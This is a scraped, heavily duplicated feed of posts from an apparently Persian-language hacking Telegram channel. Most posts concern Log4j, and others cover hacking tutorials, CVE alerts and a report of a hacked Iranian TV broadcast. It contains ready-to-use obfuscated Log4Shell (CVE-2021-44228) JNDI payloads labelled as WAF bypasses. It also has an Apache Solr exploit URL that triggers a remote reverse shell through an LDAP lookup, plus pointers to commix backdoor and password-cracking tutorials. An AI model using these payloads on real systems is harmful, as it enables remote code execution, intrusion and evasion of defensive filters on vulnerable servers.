0Day.Today | Learn Exploit | Zero World | Dark web |
Log4Shell Detector v0.1 زیاد تست نشده چون ورژن اول هست ممکنه یک سری مشکلات داشته باشه ولی کار میکنه Github #Log4J #Java —————— 0Day.Today @LearnExploit @Tech_Army
Apache Log4j 2.14.1 RCE (CVE-2021-44228)
1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
3- ${jndi:rmi://adsasd.asdasd.asdasd}
4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${jndi:ldap://127.0.0.1:1389/ badClassName}
Github
#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass WAF :1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
3- ${jndi:rmi://adsasd.asdasd.asdasd}
4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
Bypass RC1 :${jndi:ldap://127.0.0.1:1389/ badClassName}
Github
#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
Apache Log4j 2.14.1 RCE (CVE-2021-44228) Bypass WAF : 1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 3- ${jndi:rmi://adsasd.asdasd.asdasd} 4 - ${${lower:jndi}:${lowe…
CVE-2021-44228
#log4j #apache
——————
0Day.Today
@LearnExploit
@Tech_Army
apache solr exploitمنبع :
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
Security Analysis#log4j #apache
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2021-44228 apache solr exploit /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json منبع : Security Analysis #log4j #apache —————— 0Day.Today @LearnExploit @Tech_Army
افزونه ی burpsuite برای آسیب پذیری log4j
Github
منبع : امنیت اطلاعات
#Log4J #burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
منبع : امنیت اطلاعات
#Log4J #burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
کشف آسیب پذیری دوم و جدید در ورژن 2.15 در Log4j با شناسه CVE-2021-45046
این بار به جای Log4shell ما Log4dos رو شاهد هستیم که روی تارگت میخوره
باید به ورژن 2.16 اپدیت کنید یا Jndi رو کلا غیرفعال کنید .
تمامی نسخه های Log4j از Beta9-2.0 تا 2.12.1 /2.13.0 و 2.15.0 آسیب پذیر هستند
#Log4J #Log4dos #Log4shell
——————
0Day.Today
@LearnExploit
@Tech_Army
این بار به جای Log4shell ما Log4dos رو شاهد هستیم که روی تارگت میخوره
باید به ورژن 2.16 اپدیت کنید یا Jndi رو کلا غیرفعال کنید .
تمامی نسخه های Log4j از Beta9-2.0 تا 2.12.1 /2.13.0 و 2.15.0 آسیب پذیر هستند
#Log4J #Log4dos #Log4shell
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
آموزش ابزار commix و ساخت بکدور در آن
Website
#oscommandinjection #commix #kali #backdoor
AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
Website
#oscommandinjection #commix #kali #backdoor
AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
❤1
🔥9
آموزش ابزار Photon در زمینه Osint
Github
#Osint #kali #linux #tools
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Osint #kali #linux #tools
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
Github
#Log4shell #Nmap
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Log4shell #Nmap
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - Diverto/nse-log4shell: Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228) - Diverto/nse-log4shell
👍1
صدا و سیما هک شد
واکنش صداوسیما به خرابکاری اخیر در رسانه ملی
تصوير شبکه يک سيما براي لحظاتي هک شد.
عصر امروز ، در ميان پخش آنونس برنامه ها به مدت ده ثانيه، تصاويري از سران منافقين و صوت يکي از سخنراني هاي آنها روي آنتن شبکه يک ديده شد.
مسئولان فني سازمان صدا و سيما مي گويند احتمالا سرور، مورد حمله هکري قرار گرفته.
بر اساس اين گزارش، اتفاقاتي شبيه به اين در شبکه قرآن، راديو پيام و جوان هم رخ داده است
——————
0Day.Today
@LearnExploit
@Tech_Army
واکنش صداوسیما به خرابکاری اخیر در رسانه ملی
تصوير شبکه يک سيما براي لحظاتي هک شد.
عصر امروز ، در ميان پخش آنونس برنامه ها به مدت ده ثانيه، تصاويري از سران منافقين و صوت يکي از سخنراني هاي آنها روي آنتن شبکه يک ديده شد.
مسئولان فني سازمان صدا و سيما مي گويند احتمالا سرور، مورد حمله هکري قرار گرفته.
بر اساس اين گزارش، اتفاقاتي شبيه به اين در شبکه قرآن، راديو پيام و جوان هم رخ داده است
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش کرک فایل های zip و rar با john در کالی لینوکس
#john #crack #kali #zip #rar
AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
#john #crack #kali #zip #rar
AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4👍1
چندین آسیب پذیری از جمله CVE-2021-25049 و CVE-2021-24865 در پلاگین های Wordpress امکان حمله Xss , SQL Injection , Csrf و ... را برای مهاجم فراهم می کند .
پیشنهاد میشه یوزر ها سریعا اقدام به نصب پچ های امنیتی بکنند .
شناسه آسیب پذیری ها :
CVE-2021-25049
CVE-2021-25062
CVE-2021-25073
CVE-2021-24423
CVE-2021-24906
CVE-2021-25017
CVE-2021-24865
CVE-2021-24858
منبع : Wpscan
#Wpscan #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
پیشنهاد میشه یوزر ها سریعا اقدام به نصب پچ های امنیتی بکنند .
شناسه آسیب پذیری ها :
CVE-2021-25049
CVE-2021-25062
CVE-2021-25073
CVE-2021-24423
CVE-2021-24906
CVE-2021-25017
CVE-2021-24865
CVE-2021-24858
منبع : Wpscan
#Wpscan #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش استفاده از ابزار masscan در کالی لینوکس
#masscan #scan #kali
AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
#masscan #scan #kali
AT7
——————
0Day.Today
@LearnExploit
@Tech_Army